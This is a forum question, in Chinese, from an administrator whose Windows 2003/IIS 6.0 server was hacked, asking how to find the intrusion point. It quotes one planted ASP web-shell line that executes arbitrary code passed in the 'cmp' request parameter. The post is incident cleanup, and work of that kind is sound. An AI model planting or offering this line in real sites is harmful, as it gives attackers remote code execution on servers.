【发布时间】:2013-10-14 10:10:45
【问题描述】:
我的一位客户在 google 搜索结果中注意到一条消息,称他们的网站可能已被黑客入侵。经过一番挖掘,我在服务器上发现了包含 seo 垃圾和 javascript 引用的 html 文件。我删除了这些文件,更改了 cms 密码,更新了一些组件,如 CKFinder 等......
然后我开始查看服务器上的其他站点,并发现大量带有这一行的 .asp 文件
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
我已经删除了这些,但不知道它们是如何到达那里的。我查看了各种日志(事件查看器、网站、ftp),但大多数都没有从文件创建时回溯到足够远的地方。
我更新了操作系统,只有一两个月才过时,并更改了 ftp 访问权限。
我还能做些什么来找到入口点或确保我的服务器和网站是安全的?
顺便说一句:这是一个运行 IIS 6.0 的 Windows 2003 服务器。
【问题讨论】:
-
Windows 2003“只有一两个月过时”?
-
参考windows更新...